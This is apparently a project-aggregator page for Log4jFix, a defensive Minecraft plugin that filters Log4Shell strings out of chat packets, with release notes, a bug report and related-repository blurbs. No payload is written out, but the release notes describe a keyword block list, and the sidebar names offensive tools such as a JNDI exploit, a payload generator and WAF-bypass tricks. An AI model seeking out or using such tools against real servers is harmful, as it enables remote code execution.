Fixes the log4j exploit from being sent to Minecraft clients.

Last update: Oct 25, 2022

Related tags

Overview

⚠️ DEPRECATION ⚠️

Mojang has now released client updates, making this plugin obsolete. Make sure to fully restart your client. If you haven't already update your backend servers -- only updating your server jars will fix the exploit. Join the paper discord and read the pins in #paper-help.

Log4jFix

Fixes the log4j exploit from reaching connected Minecraft clients.

Building it yourself

Inside the log4jfix-velocity/ folder, create a subfolder called libs. Download and place the velocity-proxy jar in that folder and modify log4jfix-velocity/build.gradle.kts accordingly.

CVE-2021-44228 (Apache Log4j Remote Code Execution）

CVE-2021-44228 (Apache Log4j Remote Code Execution） all log4j-core versions =2.0-beta9 and =2.14.1 The version of 1.x has other vulnerabilities, it

Apr 23, 2022

Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046

Log4j-HammerTime This Burp Suite Active Scanner extension validates exploitation of the Apache Log4j CVE-2021-44228 and CVE-2021-45046 vulnerabilities

Jan 8, 2022

A simple HWID authentication system for your minecraft mod.

HWID-Authentication-System A simple HWID authentication system for your minecraft mod. This is a simple mod which can prevent unwanted users from runn

Dec 10, 2022

A simple HWID authentication system for your minecraft mod.

HWID-Authentication-System A simple HWID authentication system for your minecraft mod. This is a simple mod which can prevent unwanted users from runn

Dec 10, 2022

This is plugin for 1.17 Spigot/Bukkit Minecraft's servers.

This is plugin for 1.17 Spigot/Bukkit Minecraft's servers. This plugin fixes BowExploit(BowBomb) that found recently. Meteor Client developers released their fix, but the problem is that it fixes vanills arrow mechanics. Together I with https://github.com/l1tecorejz we made a plugin that fixes the exploit and doesn't

Jan 3, 2023

A injection client for Minecraft 1.8.9forge,forked and optimize on VapuLite

May 8, 2022

A singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).

MC-Log4J-Patcher The goal of this project is to provide Minecraft players, and server owners, peace of mind in regards to the recently discovered Log4

Jan 4, 2022

Fixes Minecraft client lag from receiving chat messages, at the expense of not being able to block players in chat.

chat-lag-fix Fixes Minecraft client lag from receiving chat messages, at the expense of not being able to block players in chat. Mojang in their infin

Dec 4, 2022

Apache Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor, Log4j 1.x, and provides many of the improvements available in Logback while fixing some inherent problems in Logback's architecture.

Apache Log4j 2 Apache Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor, Log4j 1.x, and provides many of the

Jan 4, 2023

Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too!

Log4-detector Scanner that detects vulnerable Log4J versions to help teams assess their exposure to CVE-2021-44228 (CRITICAL), CVE-2021-45046, CVE-202

Dec 26, 2022

A plugin that allows server owners to override sent biome to clients.

BiomeVisuals BiomeVisuals allows you to override biome data before it is sent to the client, allowing you to display special effects. Documentation In

Dec 22, 2022

LecternCrashFix - Fixes the lectern crash/exploit.

LecternCrashFix This fixes the new lectern crash/exploit. This bug is fixed on Paper build 276 and above. This is also fixed on CraftBukkit. Make sure

Jun 5, 2022

JNDI-Exploit is an exploit on Java Naming and Directory Interface (JNDI) from the deleted project fromthe user feihong on GitHub.

JNDI-Exploit JNDI-Exploit is a fork from the deleted project ftom the user feihong-cs on GitHub. To learn more about JNDI and what you can do with thi

Dec 6, 2022

LOG4J Java exploit - WAF and patches bypass tricks

🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter | Follow me on 🐱‍💻 ✂️ 🤬 LOG4J Java exploit - WAF and patches bypass tr

Jan 7, 2023

A simple minecraft mod for 1.12.2 which logs sent and received packets.

Packet-Logger A simple minecraft mod for 1.12.2 which logs sent and received packets. Usage You must have Forge 1.12.2 installed. Download the jar fro

Dec 2, 2022

Two Spring-boot applications registering themselves to an spring-boot-admin-server application as separate clients for the purpose of monitoring and managing the clients

Spring-boot-admin implementation with 1 Server and 2 clients Creating a Server application to monitor and manage Spring boot applications (clients) un

Dec 6, 2022

log4j-scanner is a project derived from other members of the open-source community by CISA's Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.

Log4j Scanner This repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046). The

Dec 22, 2022

Oxygen-log4j-patcher - A tool that upgrades the log4j from an Oxygen installation to version 2.16

Oxygen XML Patch Tool for Apache Log4j vulnerability CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 This is a tool that updates the log4j version 2

Jan 10, 2022

Log4j-payload-generator - Log4j jndi injects the Payload generator

0x01 简介 log4j-payload-generator是 woodpecker框架生产log4 jndi注入漏洞payload的插件。目前可以一键生产以下5类payload。原始payload {[upper|lower]:x}类型随机混payload {[upper|lower]:x}

Dec 30, 2022

Comments

Filter contents of all types of components sent by plugins

This properly filters the string out of all possible contents of a chat packet (Spigot's Bungee components and adventure components) instead of just Vanilla components ones. It also filter the full json too (as there might be cases where plain text does not match up with what is logged).

And yes, I realise that all clients should be fixed and it's basically their issue but the false sense of security the plugin provides right now warrants a PR of this imo.

Could the code be prettier? Probably. Does it work anyways? Yes.

opened by Phoenix616 6
Unhandled exception in onPacketSending(PacketEvent)

Well, I appreciate your hard work.

Your patch fixes a few exploits that can be abused so easily in chat.

You have done a great job patching the exploit at the application level.

At least it's a very useful temporary patch during the first few hours of the chaos.

Just before making it an obsolete project, maybe can you address the following errors?

[Log4jFix] Unhandled exception number 16384 occured in onPacketSending(PacketEvent) for Log4jFix java.lang.NoClassDefFoundError: net/kyori/adventure/text/Component at dev.frankheijden.log4jfix.bukkit.Log4jFixBukkit$1.onPacketSending(Log4jFixBukkit.java:28) ~[?:?] at com.comphenix.protocol.injector.SortedPacketListenerList.invokeSendingListener(SortedPacketListenerList.java:195) ~[?:?] at com.comphenix.protocol.injector.SortedPacketListenerList.invokePacketSending(SortedPacketListenerList.java:149) ~[?:?] at com.comphenix.protocol.injector.PacketFilterManager.handlePacket(PacketFilterManager.java:535) ~[?:?] at com.comphenix.protocol.injector.PacketFilterManager.invokePacketSending(PacketFilterManager.java:516) ~[?:?] at com.comphenix.protocol.injector.netty.ProtocolInjector.packetQueued(ProtocolInjector.java:346) ~[?:?] at com.comphenix.protocol.injector.netty.ProtocolInjector.onPacketSending(ProtocolInjector.java:308) ~[?:?] at com.comphenix.protocol.injector.netty.ChannelInjector.processSending(ChannelInjector.java:433) ~[?:?] at com.comphenix.protocol.injector.netty.ChannelInjector.access$800(ChannelInjector.java:70) ~[?:?] at com.comphenix.protocol.injector.netty.ChannelInjector$3.handleScheduled(ChannelInjector.java:373) ~[?:?] at com.comphenix.protocol.injector.netty.ChannelInjector$3.onMessageScheduled(ChannelInjector.java:343) ~[?:?] at com.comphenix.protocol.injector.netty.ChannelProxy$2.schedulingRunnable(ChannelProxy.java:127) ~[?:?] at com.comphenix.protocol.injector.netty.EventLoopProxy.execute(EventLoopProxy.java:95) ~[?:?] at net.minecraft.server.v1_8_R3.NetworkManager.a(NetworkManager.java:192) ~[server.jar:git-Spigot-21fe707-741a1bd] at net.minecraft.server.v1_8_R3.NetworkManager.handle(NetworkManager.java:141) ~[server.jar:git-Spigot-21fe707-741a1bd] at net.minecraft.server.v1_8_R3.PlayerConnection.sendPacket(PlayerConnection.java:907) ~[server.jar:git-Spigot-21fe707-741a1bd] at org.bukkit.craftbukkit.v1_8_R3.entity.CraftPlayer.sendRawMessage(CraftPlayer.java:146) ~[server.jar:git-Spigot-21fe707-741a1bd] at org.bukkit.craftbukkit.v1_8_R3.entity.CraftPlayer.sendMessage(CraftPlayer.java:153) ~[server.jar:git-Spigot-21fe707-741a1bd] at fr.xephi.authme.process.login.AsynchronousLogin.displayOtherAccounts(AsynchronousLogin.java:307) ~[?:?] at fr.xephi.authme.process.login.AsynchronousLogin.performLogin(AsynchronousLogin.java:252) ~[?:?] at fr.xephi.authme.process.login.AsynchronousLogin.login(AsynchronousLogin.java:101) ~[?:?] at fr.xephi.authme.process.Management.lambda$performLogin$0(Management.java:53) ~[?:?] at org.bukkit.craftbukkit.v1_8_R3.scheduler.CraftTask.run(CraftTask.java:71) [server.jar:git-Spigot-21fe707-741a1bd] at org.bukkit.craftbukkit.v1_8_R3.scheduler.CraftAsyncTask.run(CraftAsyncTask.java:53) [server.jar:git-Spigot-21fe707-741a1bd] at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) [?:1.8.0_282] at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) [?:1.8.0_282] at java.lang.Thread.run(Thread.java:748) [?:1.8.0_282]

This error only happens in the latest version, which is 1.0.4. I don't have these in 1.0.1.

Again, thanks for your hard work.

FYI, I was using ProtocolLib 4.7.0 and ViaVersion 4.1.1. Spigot 1.8.8 (with the RCE exploit patched)

opened by mokdennie26 1

Releases(v1.0.5)

v1.0.5(Dec 12, 2021)
⚠️DEPRECATION⚠️

I can't stress this enough, DO NOT USE THIS AS A SUBSTITUTE FOR FIXING YOUR BACKENDS OR CLIENT.

Mojang has now released client updates, making this plugin obsolete. Make sure to fully restart your client, and update / inform yourself about any client-side mods you use. If you haven't already update your backend servers -- only updating your server jars will fix the exploit. Join the paper discord and read the pins in #paper-help.

1.0.5

Bring back support for spigot 1.8+

JDK Requirements

Universal/Velocity >= JDK 11 Bukkit/Bungee >= JDK 8
Source code(tar.gz)
Source code(zip)
Log4jFix-1.0.5-all.jar(18.69 KB)
log4jfix-bukkit-1.0.5-all.jar(10.70 KB)
log4jfix-bungee-1.0.5-all.jar(6.53 KB)
log4jfix-velocity-1.0.5-all.jar(6.76 KB)
v1.0.4(Dec 11, 2021)
⚠️DEPRECATION⚠️

I can't stress this enough, DO NOT USE THIS AS A SUBSTITUTE FOR FIXING YOUR BACKENDS OR CLIENT.

Mojang has now released client updates, making this plugin obsolete. Make sure to fully restart your client, and update / inform yourself about any client-side mods you use. If you haven't already update your backend servers -- only updating your server jars will fix the exploit. Join the paper discord and read the pins in #paper-help.

1.0.4

Filter contents of all types of components sent by plugins

JDK Requirements

Universal/Velocity >= JDK 11 Bukkit/Bungee >= JDK 8
Source code(tar.gz)
Source code(zip)
Log4jFix-1.0.4-all.jar(18.06 KB)
log4jfix-bukkit-1.0.4-all.jar(10.07 KB)
log4jfix-bungee-1.0.4-all.jar(6.53 KB)
log4jfix-velocity-1.0.4-all.jar(6.76 KB)
v1.0.3(Dec 11, 2021)
⚠️DEPRECATION⚠️

Mojang has now released client updates, making this plugin obsolete. Make sure to fully restart your client. If you haven't already update your backend servers -- only updating your server jars will fix the exploit. Join the paper discord and read the pins in #paper-help.

1.0.3

Match everything that could be string substituted

JDK Requirements

Universal/Velocity >= JDK 11 Bukkit/Bungee >= JDK 8
Source code(tar.gz)
Source code(zip)
Log4jFix-1.0.3-all.jar(17.51 KB)
log4jfix-bukkit-1.0.3-all.jar(9.50 KB)
log4jfix-bungee-1.0.3-all.jar(6.53 KB)
log4jfix-velocity-1.0.3-all.jar(6.76 KB)
v1.0.2(Dec 10, 2021)
1.0.2

Matching is done case insensitive

Adds more keys to the blocked list

JDK Requirements

Universal/Velocity >= JDK 11 Bukkit/Bungee >= JDK 8
Source code(tar.gz)
Source code(zip)
Log4jFix-1.0.2-all.jar(17.59 KB)
log4jfix-bukkit-1.0.2-all.jar(9.58 KB)
log4jfix-bungee-1.0.2-all.jar(6.61 KB)
log4jfix-velocity-1.0.2-all.jar(6.84 KB)
v1.0.1(Dec 10, 2021)

JDK Requirements

Universal/Velocity >= JDK 11 Bukkit/Bungee >= JDK 8
Source code(tar.gz)
Source code(zip)
Log4jFix-1.0.1-all.jar(17.33 KB)
log4jfix-bukkit-1.0.1-all.jar(9.33 KB)
log4jfix-bungee-1.0.1-all.jar(6.54 KB)
log4jfix-velocity-1.0.1-all.jar(6.76 KB)
v1.0.0(Dec 10, 2021)

Source code(tar.gz)
Source code(zip)
Log4jFix-1.0.0-all.jar(16.99 KB)
log4jfix-bukkit-1.0.0-all.jar(9.28 KB)
log4jfix-bungee-1.0.0-all.jar(6.46 KB)
log4jfix-velocity-1.0.0-all.jar(6.54 KB)

Owner

Frank van der Heijden

📚 Student at Delft University of Technology, BSc Computer Science and Engineering | Discord: FrankHeijden#0099

GitHub

LecternCrashFix - Fixes the lectern crash/exploit.

LecternCrashFix This fixes the new lectern crash/exploit. This bug is fixed on Paper build 276 and above. This is also fixed on CraftBukkit. Make sure

7 Jun 5, 2022

JNDI-Exploit is an exploit on Java Naming and Directory Interface (JNDI) from the deleted project fromthe user feihong on GitHub.

JNDI-Exploit JNDI-Exploit is a fork from the deleted project ftom the user feihong-cs on GitHub. To learn more about JNDI and what you can do with thi